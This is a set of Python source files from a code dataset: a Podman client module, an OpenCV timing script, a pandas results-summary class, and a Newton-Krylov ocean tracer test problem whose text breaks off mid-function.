Default:False\n\n Returns:\n PodmanClient: used to communicate with Podman service\n \"\"\"\n # FIXME Should parameters be *args, **kwargs and resolved before calling PodmanClient()?\n\n env = os.environ\n if environment is not None:\n env = environment\n\n if credstore_env is None:\n credstore_env = {}\n\n if version == \"auto\":\n version = None\n\n tls = False\n tls_verify = env.get(\"CONTAINER_TLS_VERIFY\") or env.get(\"DOCKER_TLS_VERIFY\")\n if tls_verify or ssl_version or assert_hostname:\n cert_path = (\n env.get(\"CONTAINER_CERT_PATH\")\n or env.get(\"DOCKER_CERT_PATH\")\n or os.path.join(os.path.expanduser(\"~\"), \".config/containers/certs.d\")\n )\n\n tls = TLSConfig(\n client_cert=(\n os.path.join(cert_path, \"cert.pem\"),\n os.path.join(cert_path, \"key.pem\"),\n ),\n ca_cert=os.path.join(cert_path, \"ca.pem\"),\n verify=tls_verify,\n ssl_version=ssl_version or ssl.PROTOCOL_TLSv1_2,\n assert_hostname=assert_hostname,\n )\n\n host = env.get(\"CONTAINER_HOST\") or env.get(\"DOCKER_HOST\") or None\n\n return PodmanClient(\n base_url=host,\n version=version,\n timeout=timeout,\n tls=tls,\n credstore_env=credstore_env,\n use_ssh_client=use_ssh_client,\n max_pool_size=max_pool_size,\n )\n\n @property\n def configs(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def containers(self) -> ContainersManager:\n \"\"\"Returns object for managing containers running via the Podman service.\"\"\"\n return ContainersManager(client=self.api)\n\n @property\n def images(self) -> ImagesManager:\n \"\"\"Returns object for managing images stored via the Podman service.\"\"\"\n return ImagesManager(client=self.api)\n\n @property\n def manifests(self) -> ManifestsManager:\n \"\"\"Returns object for managing manifests via the Podman service.\"\"\"\n return ManifestsManager(client=self.api)\n\n @property\n def networks(self) -> NetworksManager:\n \"\"\"Returns object for managing networks created via the Podman service.\"\"\"\n return NetworksManager(client=self.api)\n\n @property\n def volumes(self) -> VolumesManager:\n \"\"\"Returns object for managing volumes maintained via the Podman service.\"\"\"\n return VolumesManager(client=self.api)\n\n @property\n def pods(self) -> PodsManager:\n \"\"\"Returns object for managing pods created via the Podman service.\"\"\"\n return PodsManager(client=self.api)\n\n @property\n def nodes(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def secrets(self):\n \"\"\"TBD.\"\"\"\n return SecretsManager(client=self.api)\n\n @property\n def services(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def swarm(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n def df(self) -> Dict[str, Any]: # pylint: disable=missing-function-docstring,invalid-name\n return SystemManager(client=self.api).df()\n\n df.__doc__ = SystemManager.df.__doc__\n\n def events(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n return EventsManager(client=self.api).list(*args, **kwargs)\n\n events.__doc__ = EventsManager.list.__doc__\n\n def info(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n return SystemManager(client=self.api).info(*args, **kwargs)\n\n info.__doc__ = 
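PodmanClient above implements the context-manager protocol, so the typical usage against a reachable Podman service pairs from_env() with the ping() health check:

from podman import PodmanClient

# from_env() resolves CONTAINER_HOST/DOCKER_HOST, falling back to the
# per-user podman.sock path built in __init__ above.
with PodmanClient.from_env() as client:  # __exit__ calls close() for us
    if client.ping():
        print(client.version())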
SystemManager.info.__doc__\n\n    def login(self, *args, **kwargs):  # pylint: disable=missing-function-docstring\n        return SystemManager(client=self.api).login(*args, **kwargs)\n\n    login.__doc__ = SystemManager.login.__doc__\n\n    def ping(self) -> bool:  # pylint: disable=missing-function-docstring\n        return SystemManager(client=self.api).ping()\n\n    ping.__doc__ = SystemManager.ping.__doc__\n\n    def version(self, *args, **kwargs):  # pylint: disable=missing-function-docstring\n        _ = args\n        return SystemManager(client=self.api).version(**kwargs)\n\n    version.__doc__ = SystemManager.version.__doc__\n\n    def close(self):  # pylint: disable=missing-function-docstring\n        \"\"\"Close connection to service.\"\"\"\n        return self.api.close()\n\n    close.__doc__ = APIClient.close.__doc__\n\n\nDockerClient = PodmanClient\nfrom_env = PodmanClient.from_env\n","sub_path":"podman/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419602453","text":"import cv2\nimport numpy as np\n\n# \nstart = cv2.getTickCount()\n\nimg = cv2.imread('iha.jpg')\nres = np.uint8(np.clip((0.8 * img + 80), 0, 255))\n\nend = cv2.getTickCount()\n\nprint((end - start) / cv2.getTickFrequency())\n","sub_path":"01-Introduction-and-Installation/cv2_contrast_brightness_time.py","file_name":"cv2_contrast_brightness_time.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18293995","text":"\nfrom tkinter import filedialog# python3 #import tkFileDialog #python 2.7\n\nimport pandas as pd\n\nclass Summary_Experimental_Cycles(object):\n    '''\n    Summary_Experimental_Cycles provides methods for summarizing the\n    results of all loaded datasets\n    '''\n\n\n    def __init__(self, data_to_be_summarized):\n        self.data_list = data_to_be_summarized\n        # The parameters relevant for the evaluation should be\n        # identical for all datasets used\n        \n        self.TimeWindowSize = 0.8\n        self.IntervallShiftFraction = 0.5\n        self.AmplitudeFraction = 0.7\n        self.Smooth = 1\n        self.FreqRange = (20,60)\n\n    \n    def surface_tension_summary(self):\n        surface_tension_summary = pd.concat(\n            [pd.melt(\n                self.add_description_colmns(\n                    data.calc_st_results_vs_time(),\n                    data.data_id_string),\n                id_vars=['time', 'Temp','data'],\n                value_name='surface-tension[Nm]'\n                )\n            \n            for data in self.data_list\n            ]\n            )\n        print(surface_tension_summary)\n        \n        # store results\n        file_fqn = filedialog.asksaveasfilename(\n            title = \"save surface-tension data as for all loaded datasets\",\n            initialdir = '/home/stephan/workspace/Projekt_Metalllegierungsschmelzen/Daten/ISS/LEK94',\n            defaultextension = '.csv',\n            filetypes=[(\"csv file\", \"*.csv\")],\n            initialfile=\"alloy_?_surface_tension_results.csv\"\n            )\n        surface_tension_summary.to_csv(file_fqn, encoding='utf-8')\n        \n        \n    def viscosity_summary(self):\n        \n        viscosity_summary = pd.concat(\n            [self.add_description_colmns(data.calc_viscosity_vs_time()['viscosity_data'], \n                                         data.data_id_string) \n            for data in self.data_list\n            ]\n            )\n        print(viscosity_summary)\n        \n        file_fqn = filedialog.asksaveasfilename(\n            title = \"save viscosity data for all loaded datasets\",\n            initialdir = '/home/stephan/workspace/Projekt_Metalllegierungsschmelzen/Daten/ISS/LEK94',\n            defaultextension = '.csv',\n            filetypes=[(\"csv file\", \"*.csv\")],\n            initialfile=\"alloy_?_viscosity_results.csv\"\n            )\n\n        viscosity_summary.to_csv(file_fqn, encoding='utf-8')\n        \n    # utility 
functions\n def add_description_colmns(self, data, description):\n data.loc[:, 'data'] = description\n return(data)","sub_path":"src/model/summary_experimental_cycles.py","file_name":"summary_experimental_cycles.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168453869","text":"#!/usr/bin/env python\n\"\"\"test problem for Newton-Krylov solver\"\"\"\n\nimport argparse\nimport configparser\nimport logging\nimport os\nimport subprocess\nimport sys\n\nimport numpy as np\nfrom scipy.linalg import solve_banded, svd\nfrom scipy.sparse import diags\nfrom scipy.sparse.linalg import spsolve\nfrom scipy.integrate import solve_ivp\n\nfrom netCDF4 import Dataset\n\nfrom model import ModelStateBase, TracerModuleStateBase\nfrom model_config import ModelConfig, get_modelinfo\nfrom newton_fcn_base import NewtonFcnBase\nfrom solver import SolverState\n\ndef _parse_args():\n \"\"\"parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\"test problem for Newton-Krylov solver\")\n parser.add_argument(\n 'cmd', choices=['comp_fcn', 'gen_precond_jacobian', 'apply_precond_jacobian'],\n help='command to run')\n parser.add_argument(\n '--cfg_fname', help='name of configuration file', default='newton_krylov.cfg')\n parser.add_argument(\n '--workdir', help='directory that filename are relative to', default='.')\n parser.add_argument('--hist_fname', help='name of history file', default=None)\n parser.add_argument('--precond_fname', help='name of precond file', default=None)\n parser.add_argument('--in_fname', help='name of file with input')\n parser.add_argument('--res_fname', help='name of file for result')\n return parser.parse_args()\n\ndef main(args):\n \"\"\"test problem for Newton-Krylov solver\"\"\"\n\n config = configparser.ConfigParser()\n config.read(args.cfg_fname)\n solverinfo = config['solverinfo']\n\n logging_format = '%(asctime)s:%(process)s:%(filename)s:%(funcName)s:%(message)s'\n logging.basicConfig(\n stream=sys.stdout, format=logging_format, level=solverinfo['logging_level'])\n logger = logging.getLogger(__name__)\n\n logger.info('args.cmd=\"%s\"', args.cmd)\n\n # store cfg_fname in modelinfo, to ease access to its value elsewhere\n config['modelinfo']['cfg_fname'] = args.cfg_fname\n\n ModelConfig(config['modelinfo'])\n\n newton_fcn = NewtonFcn()\n\n solver_state = SolverState('newton_fcn_test_problem', args.workdir)\n\n ms_in = ModelState(os.path.join(args.workdir, args.in_fname))\n if args.cmd == 'comp_fcn':\n newton_fcn.comp_fcn(\n ms_in, os.path.join(args.workdir, args.res_fname), None,\n os.path.join(args.workdir, args.hist_fname))\n elif args.cmd == 'gen_precond_jacobian':\n newton_fcn.gen_precond_jacobian(\n ms_in, os.path.join(args.workdir, args.hist_fname),\n os.path.join(args.workdir, args.precond_fname), solver_state)\n elif args.cmd == 'apply_precond_jacobian':\n newton_fcn.apply_precond_jacobian(\n ms_in, os.path.join(args.workdir, args.precond_fname),\n os.path.join(args.workdir, args.res_fname), solver_state)\n else:\n msg = 'unknown cmd=%s' % args.cmd\n raise ValueError(msg)\n\n logger.info('done')\n\n################################################################################\n\nclass ModelState(ModelStateBase):\n \"\"\"class for representing the state space of a model\"\"\"\n\n # give ModelState operators higher priority than those of numpy\n __array_priority__ = 100\n\n def __init__(self, vals_fname=None):\n logger = logging.getLogger(__name__)\n 
logger.debug('ModelState, vals_fname=\"%s\"', vals_fname)\n super().__init__(TracerModuleState, vals_fname)\n\n################################################################################\n\nclass TracerModuleState(TracerModuleStateBase):\n \"\"\"\n Derived class for representing a collection of model tracers.\n It implements _read_vals and dump.\n \"\"\"\n\n def _read_vals(self, tracer_module_name, vals_fname):\n \"\"\"return tracer values and dimension names and lengths, read from vals_fname)\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug(\n 'tracer_module_name=\"%s\", vals_fname=\"%s\"', tracer_module_name, vals_fname)\n dims = {}\n with Dataset(vals_fname, mode='r') as fptr:\n fptr.set_auto_mask(False)\n # get dims from first variable\n dimnames0 = fptr.variables[self.tracer_names()[0]].dimensions\n for dimname in dimnames0:\n dims[dimname] = fptr.dimensions[dimname].size\n # all tracers are stored in a single array\n # tracer index is the leading index\n vals = np.empty((self.tracer_cnt(),) + tuple(dims.values()))\n # check that all vars have the same dimensions\n for tracer_name in self.tracer_names():\n if fptr.variables[tracer_name].dimensions != dimnames0:\n msg = 'not all vars have same dimensions' \\\n ', tracer_module_name=%s, vals_fname=%s' \\\n % (tracer_module_name, vals_fname)\n raise ValueError(msg)\n # read values\n if len(dims) > 3:\n msg = 'ndim too large (for implementation of dot_prod)' \\\n 'tracer_module_name=%s, vals_fname=%s, ndim=%s' \\\n % (tracer_module_name, vals_fname, len(dims))\n raise ValueError(msg)\n for tracer_ind, tracer_name in enumerate(self.tracer_names()):\n varid = fptr.variables[tracer_name]\n vals[tracer_ind, :] = varid[:]\n return vals, dims\n\n def dump(self, fptr, action):\n \"\"\"\n perform an action (define or write) of dumping a TracerModuleState object\n to an open file\n \"\"\"\n if action == 'define':\n for dimname, dimlen in self._dims.items():\n try:\n if fptr.dimensions[dimname].size != dimlen:\n msg = 'dimname already exists and has wrong size' \\\n 'tracer_module_name=%s, dimname=%s' \\\n % (self._tracer_module_name, dimname)\n raise ValueError(msg)\n except KeyError:\n fptr.createDimension(dimname, dimlen)\n dimnames = tuple(self._dims.keys())\n # define all tracers\n for tracer_name in self.tracer_names():\n fptr.createVariable(tracer_name, 'f8', dimensions=dimnames)\n elif action == 'write':\n # write all tracers\n for tracer_ind, tracer_name in enumerate(self.tracer_names()):\n fptr.variables[tracer_name][:] = self._vals[tracer_ind, :]\n else:\n msg = 'unknown action=%s', action\n raise ValueError(msg)\n return self\n\n################################################################################\n\nclass NewtonFcn(NewtonFcnBase):\n \"\"\"class of methods related to problem being solved with Newton's method\"\"\"\n def __init__(self):\n self.time_range = (0.0, 365.0)\n self.depth = Depth('grid_files/depth_axis_test.nc')\n\n # tracer_module_names and tracer_names will be stored in the following attributes,\n # enabling access to them from inside _comp_tend\n self._tracer_module_names = None\n self._tracer_names = None\n\n def model_state_obj(self, fname=None):\n \"\"\"return a ModelState object compatible with this function\"\"\"\n return ModelState(fname)\n\n def comp_fcn(self, ms_in, res_fname, solver_state, hist_fname=None):\n \"\"\"evalute function being solved with Newton's method\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('res_fname=\"%s\", hist_fname=\"%s\"', res_fname, hist_fname)\n\n 
if solver_state is not None:\n fcn_complete_step = 'comp_fcn complete for %s' % res_fname\n if solver_state.step_logged(fcn_complete_step):\n logger.debug('\"%s\" logged, returning result', fcn_complete_step)\n return ModelState(res_fname)\n logger.debug('\"%s\" not logged, proceeding', fcn_complete_step)\n\n self._tracer_module_names = ms_in.tracer_module_names\n self._tracer_names = ms_in.tracer_names()\n tracer_vals_init = np.empty((len(self._tracer_names), self.depth.axis.nlevs))\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n tracer_vals_init[tracer_ind, :] = ms_in.get_tracer_vals(tracer_name)\n\n # solve ODEs, using scipy.integrate\n # get dense output, if requested\n t_eval = np.linspace(\n self.time_range[0], self.time_range[1],\n 101 if hist_fname is not None else 2)\n sol = solve_ivp(\n self._comp_tend, self.time_range, tracer_vals_init.reshape(-1), 'Radau',\n t_eval, atol=1.0e-10, rtol=1.0e-10)\n\n if hist_fname is not None:\n self._write_hist(sol, hist_fname)\n\n ms_res = ms_in.copy()\n res_vals = sol.y[:, -1].reshape(tracer_vals_init.shape) - tracer_vals_init\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n ms_res.set_tracer_vals(tracer_name, res_vals[tracer_ind, :])\n\n self.comp_fcn_postprocess(ms_res, res_fname)\n\n if solver_state is not None:\n solver_state.log_step(fcn_complete_step)\n logger.debug('invoking resume script and exiting')\n subprocess.Popen([get_modelinfo('nk_driver_invoker_fname'), '--resume'])\n raise SystemExit\n\n return ms_res\n\n def _comp_tend(self, time, tracer_vals_flat):\n \"\"\"compute tendency function\"\"\"\n tracer_vals = tracer_vals_flat.reshape((len(self._tracer_names), -1))\n dtracer_vals_dt = np.empty_like(tracer_vals)\n for tracer_module_name in self._tracer_module_names:\n if tracer_module_name == 'iage_test':\n tracer_ind = self._tracer_names.index('iage_test')\n self._comp_tend_iage_test(\n time, tracer_vals[tracer_ind, :], dtracer_vals_dt[tracer_ind, :])\n if tracer_module_name == 'phosphorus':\n tracer_ind0 = self._tracer_names.index('po4')\n self._comp_tend_phosphorus(\n time, tracer_vals[tracer_ind0:tracer_ind0+6, :],\n dtracer_vals_dt[tracer_ind0:tracer_ind0+6, :])\n return dtracer_vals_dt.reshape(-1)\n\n def _comp_tend_iage_test(self, time, tracer_vals, dtracer_vals_dt):\n \"\"\"\n compute tendency for iage_test\n tendency units are tr_units / day\n \"\"\"\n # age 1/year\n dtracer_vals_dt[:] = (1.0 / 365.0) + self.depth.mixing_tend(time, tracer_vals)\n # restore in surface to 0 at a rate of 24.0 / day\n dtracer_vals_dt[0] = -24.0 * tracer_vals[0]\n\n def _comp_tend_phosphorus(self, time, tracer_vals, dtracer_vals_dt):\n \"\"\"\n compute tendency for phosphorus tracers\n tendency units are tr_units / day\n \"\"\"\n\n # light has e-folding decay of 25m, po4 half-saturation = 0.5\n po4 = tracer_vals[0, :]\n po4_lim = np.where(po4 > 0.0, po4 / (po4 + 0.5), 0.0)\n po4_uptake = np.exp((-1.0 / 25.0) * self.depth.axis.mid) * po4_lim\n\n self._comp_tend_phosphorus_core(\n time, po4_uptake, tracer_vals[0:3, :], dtracer_vals_dt[0:3, :])\n self._comp_tend_phosphorus_core(\n time, po4_uptake, tracer_vals[3:6, :], dtracer_vals_dt[3:6, :])\n\n # restore po4_s to po4, at a rate of 1 / day\n # compensate equally from and dop and pop,\n # so that total shadow phosphorus is conserved\n rest_term = 1.0 * (dtracer_vals_dt[0, 0] - dtracer_vals_dt[3, 0])\n dtracer_vals_dt[3, 0] += rest_term\n dtracer_vals_dt[4, 0] -= 0.67 * rest_term\n dtracer_vals_dt[5, 0] -= 0.33 * rest_term\n\n def _comp_tend_phosphorus_core(self, 
time, po4_uptake, tracer_vals, dtracer_vals_dt):\n \"\"\"\n core fuction for computing tendency for phosphorus tracers\n tendency units are tr_units / day\n \"\"\"\n\n po4 = tracer_vals[0, :]\n dop = tracer_vals[1, :]\n pop = tracer_vals[2, :]\n\n # dop remin rate is 1% / day\n dop_remin = np.where(dop > 0.0, 0.01 * dop, 0.0)\n # pop remin rate is 1% / day\n pop_remin = np.where(pop > 0.0, 0.01 * pop, 0.0)\n\n sigma = 0.67\n\n dtracer_vals_dt[0, :] = -po4_uptake + dop_remin + pop_remin \\\n + self.depth.mixing_tend(time, po4)\n dtracer_vals_dt[1, :] = sigma * po4_uptake - dop_remin \\\n + self.depth.mixing_tend(time, dop)\n dtracer_vals_dt[2, :] = (1.0 - sigma) * po4_uptake - pop_remin \\\n + self.depth.mixing_tend(time, pop) + self._sinking_tend(pop)\n\n def _sinking_tend(self, tracer_vals):\n \"\"\"tracer tendency from sinking\"\"\"\n tracer_flux_neg = np.zeros(1+self.depth.axis.nlevs)\n tracer_flux_neg[1:-1] = -tracer_vals[:-1] # assume velocity is 1 m / day\n return np.ediff1d(tracer_flux_neg) * self.depth.axis.delta_r\n\n def _def_hist_dims(self, fptr):\n \"\"\"define netCDF4 dimensions relevant to test_problem\"\"\"\n fptr.createDimension('time', None)\n fptr.createDimension('depth', self.depth.axis.nlevs)\n fptr.createDimension('depth_edges', 1+self.depth.axis.nlevs)\n\n def _def_hist_coord_vars(self, fptr):\n \"\"\"define netCDF4 coordinate vars relevant to test_problem\"\"\"\n fptr.createVariable('time', 'f8', dimensions=('time',))\n fptr.variables['time'].long_name = 'time'\n fptr.variables['time'].units = 'days since 0001-01-01'\n\n fptr.createVariable('depth', 'f8', dimensions=('depth',))\n fptr.variables['depth'].long_name = 'depth'\n fptr.variables['depth'].units = 'm'\n\n fptr.createVariable('depth_edges', 'f8', dimensions=('depth_edges',))\n fptr.variables['depth_edges'].long_name = 'depth_edges'\n fptr.variables['depth_edges'].units = 'm'\n\n def _write_hist_coord_vars(self, fptr, sol):\n \"\"\"write netCDF4 coordinate vars relevant to test_problem\"\"\"\n fptr.variables['time'][:] = sol.t\n fptr.variables['depth'][:] = self.depth.axis.mid\n fptr.variables['depth_edges'][:] = self.depth.axis.edges\n\n def _write_hist(self, sol, hist_fname):\n \"\"\"write tracer values generated in comp_fcn to hist_fname\"\"\"\n with Dataset(hist_fname, mode='w') as fptr:\n self._def_hist_dims(fptr)\n self._def_hist_coord_vars(fptr)\n\n for tracer_name in self._tracer_names:\n fptr.createVariable(tracer_name, 'f8', dimensions=('time', 'depth'))\n\n fptr.createVariable('mixing_coeff', 'f8', dimensions=('time', 'depth_edges'))\n fptr.variables['mixing_coeff'].long_name = 'vertical mixing coefficient'\n fptr.variables['mixing_coeff'].units = 'm2 s-1'\n\n self._write_hist_coord_vars(fptr, sol)\n\n tracer_vals = sol.y.reshape(\n (len(self._tracer_names), self.depth.axis.nlevs, -1))\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n fptr.variables[tracer_name][:] = tracer_vals[tracer_ind, :, :].transpose()\n\n for time_ind, time in enumerate(sol.t):\n fptr.variables['mixing_coeff'][time_ind, :] = \\\n (1.0 / 86400.0) * self.depth.mixing_coeff(time)\n\n def apply_precond_jacobian(self, ms_in, precond_fname, res_fname, solver_state):\n \"\"\"apply preconditioner of jacobian of comp_fcn to model state object, ms_in\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('precond_fname=\"%s\", res_fname=\"%s\"', precond_fname, res_fname)\n\n fcn_complete_step = 'apply_precond_jacobian complete for %s' % res_fname\n if solver_state.step_logged(fcn_complete_step):\n 
logger.debug('\"%s\" logged, returning result', fcn_complete_step)\n return ModelState(res_fname)\n logger.debug('\"%s\" not logged, proceeding', fcn_complete_step)\n\n ms_res = ms_in.copy()\n\n with Dataset(precond_fname, 'r') as fptr:\n # hist and precond files have mixing_coeff in m2 s-1\n # convert back to model units of m2 d-1\n mca = 86400.0 * fptr.variables['mixing_coeff_log_avg'][:]\n\n for tracer_module_name in ms_in.tracer_module_names:\n if tracer_module_name == 'iage_test':\n self._apply_precond_jacobian_iage_test(ms_in, mca, ms_res)\n if tracer_module_name == 'phosphorus':\n self._apply_precond_jacobian_phosphorus(ms_in, mca, ms_res)\n\n solver_state.log_step(fcn_complete_step)\n\n return ms_res.dump(res_fname)\n\n def _apply_precond_jacobian_iage_test(self, ms_in, mca, ms_res):\n \"\"\"apply preconditioner of jacobian of iage_test fcn\"\"\"\n\n iage_test_in = ms_in.get_tracer_vals('iage_test')\n rhs = (1.0 / (self.time_range[1] - self.time_range[0])) * iage_test_in\n\n l_and_u = (1, 1)\n matrix_diagonals = np.zeros((3, self.depth.axis.nlevs))\n matrix_diagonals[0, 1:] = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n matrix_diagonals[1, :-1] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n matrix_diagonals[1, 1:] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n matrix_diagonals[2, :-1] = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n matrix_diagonals[1, 0] = -24.0\n matrix_diagonals[0, 1] = 0\n\n res = solve_banded(l_and_u, matrix_diagonals, rhs)\n\n ms_res.set_tracer_vals('iage_test', res - iage_test_in)\n\n def _apply_precond_jacobian_phosphorus(self, ms_in, mca, ms_res):\n \"\"\"\n apply preconditioner of jacobian of phosphorus fcn\n it is only applied to shadow phosphorus tracers\n \"\"\"\n\n po4_s = ms_in.get_tracer_vals('po4_s')\n dop_s = ms_in.get_tracer_vals('dop_s')\n pop_s = ms_in.get_tracer_vals('pop_s')\n rhs = (1.0 / (self.time_range[1] - self.time_range[0])) \\\n * np.concatenate((po4_s, dop_s, pop_s))\n\n nz = self.depth.axis.nlevs # pylint: disable=C0103\n\n matrix = diags(\n [self._diag_0_phosphorus(mca), self._diag_p_1_phosphorus(mca),\n self._diag_m_1_phosphorus(mca), self._diag_p_nz_phosphorus(),\n self._diag_m_nz_phosphorus(), self._diag_p_2nz_phosphorus(),\n self._diag_m_2nz_phosphorus()],\n [0, 1, -1, nz, -nz, 2*nz, -2*nz], format='csr')\n\n res = spsolve(matrix, rhs)\n\n _, sing_vals, r_sing_vects = svd(matrix.todense())\n min_ind = sing_vals.argmin()\n res -= (res.mean()/r_sing_vects[min_ind, :].mean()) * r_sing_vects[min_ind, :]\n\n ms_res.set_tracer_vals('po4_s', res[0:nz] - po4_s)\n ms_res.set_tracer_vals('dop_s', res[nz:2*nz] - dop_s)\n ms_res.set_tracer_vals('pop_s', res[2*nz:3*nz] - pop_s)\n\n def _diag_0_phosphorus(self, mca):\n \"\"\"return main diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_0_single_tracer = np.zeros(self.depth.axis.nlevs)\n diag_0_single_tracer[:-1] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n diag_0_single_tracer[1:] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n diag_0_po4_s = diag_0_single_tracer.copy()\n diag_0_po4_s[0] -= 1.0 # po4_s restoring in top layer\n diag_0_dop_s = diag_0_single_tracer.copy()\n diag_0_dop_s -= 0.01 # dop_s remin\n diag_0_pop_s = diag_0_single_tracer.copy()\n diag_0_pop_s -= 0.01 # pop_s remin\n # pop_s sinking loss to layer below\n diag_0_pop_s[:-1] -= 1.0 * 
self.depth.axis.delta_r[:-1]\n return np.concatenate((diag_0_po4_s, diag_0_dop_s, diag_0_pop_s))\n\n def _diag_p_1_phosphorus(self, mca):\n \"\"\"return +1 upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_single_tracer = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n diag_p_1_po4_s = diag_p_1_single_tracer.copy()\n zero = np.zeros(1)\n diag_p_1_dop_s = diag_p_1_single_tracer.copy()\n diag_p_1_pop_s = diag_p_1_single_tracer.copy()\n return np.concatenate(\n (diag_p_1_po4_s, zero, diag_p_1_dop_s, zero, diag_p_1_pop_s))\n\n def _diag_m_1_phosphorus(self, mca):\n \"\"\"return +1 upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_m_1_single_tracer = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n diag_m_1_po4_s = diag_m_1_single_tracer.copy()\n zero = np.zeros(1)\n diag_m_1_dop_s = diag_m_1_single_tracer.copy()\n diag_m_1_pop_s = diag_m_1_single_tracer.copy()\n # pop_s sinking gain from layer above\n diag_m_1_pop_s += 1.0 * self.depth.axis.delta_r[1:]\n return np.concatenate(\n (diag_m_1_po4_s, zero, diag_m_1_dop_s, zero, diag_m_1_pop_s))\n\n def _diag_p_nz_phosphorus(self):\n \"\"\"return +nz upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_dop_po4 = 0.01 * np.ones(self.depth.axis.nlevs) # dop_s remin\n diag_p_1_pop_dop = np.zeros(self.depth.axis.nlevs)\n return np.concatenate((diag_p_1_dop_po4, diag_p_1_pop_dop))\n\n def _diag_m_nz_phosphorus(self):\n \"\"\"return -nz lower diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_po4_dop = np.zeros(self.depth.axis.nlevs)\n diag_p_1_po4_dop[0] = 0.67 # po4_s restoring conservation balance\n diag_p_1_dop_pop = np.zeros(self.depth.axis.nlevs)\n return np.concatenate((diag_p_1_po4_dop, diag_p_1_dop_pop))\n\n def _diag_p_2nz_phosphorus(self):\n \"\"\"return +2nz upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n return 0.01 * np.ones(self.depth.axis.nlevs) # pop_s remin\n\n def _diag_m_2nz_phosphorus(self):\n \"\"\"return -2nz lower diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_po4_pop = np.zeros(self.depth.axis.nlevs)\n diag_p_1_po4_pop[0] = 0.33 # po4_s restoring conservation balance\n return diag_p_1_po4_pop\n\nclass SpatialAxis():\n \"\"\"class for spatial axis related quantities\"\"\"\n def __init__(self, fname, edges_varname):\n with Dataset(fname) as fptr:\n fptr.set_auto_mask(False)\n self.edges = fptr.variables[edges_varname][:]\n self.mid = 0.5 * (self.edges[:-1] + self.edges[1:])\n self.delta = np.ediff1d(self.edges)\n self.delta_r = 1.0 / self.delta\n self.delta_mid_r = 1.0 / np.ediff1d(self.mid)\n self.nlevs = len(self.mid)\n\nclass Depth():\n \"\"\"class for depth axis vals and methods\"\"\"\n def __init__(self, depth_fname):\n self.axis = SpatialAxis(depth_fname, 'depth_edges')\n\n self._time_val = None\n self._mixing_coeff_vals = np.empty(self.axis.nlevs)\n\n def mixing_tend(self, time, tracer_vals):\n \"\"\"tracer tendency from mixing\"\"\"\n tracer_grad = np.zeros(1+self.axis.nlevs)\n tracer_grad[1:-1] = np.ediff1d(tracer_vals) * self.axis.delta_mid_r\n tracer_flux_neg = self.mixing_coeff(time) * tracer_grad\n return np.ediff1d(tracer_flux_neg) * self.axis.delta_r\n\n def mixing_coeff(self, time):\n \"\"\"\n vertical mixing coefficient, m2 d-1\n store computed vals, so their computation can be skipped on subsequent calls\n \"\"\"\n\n # if vals have already been computed for this time, skip computation\n if time == 
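The iage preconditioner above hands scipy.linalg.solve_banded a matrix in diagonal-ordered form with l_and_u = (1, 1). A tiny self-checking example of that storage convention, assuming a 3x3 tridiagonal system:

import numpy as np
from scipy.linalg import solve_banded

# Row 0 holds the superdiagonal (padded on the left), row 1 the main
# diagonal, row 2 the subdiagonal (padded on the right).
ab = np.array([[0.0, 1.0, 1.0],
               [4.0, 4.0, 4.0],
               [1.0, 1.0, 0.0]])
rhs = np.array([6.0, 12.0, 18.0])
x = solve_banded((1, 1), ab, rhs)

dense = np.array([[4.0, 1.0, 0.0],
                  [1.0, 4.0, 1.0],
                  [0.0, 1.0, 4.0]])
assert np.allclose(dense @ x, rhs)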
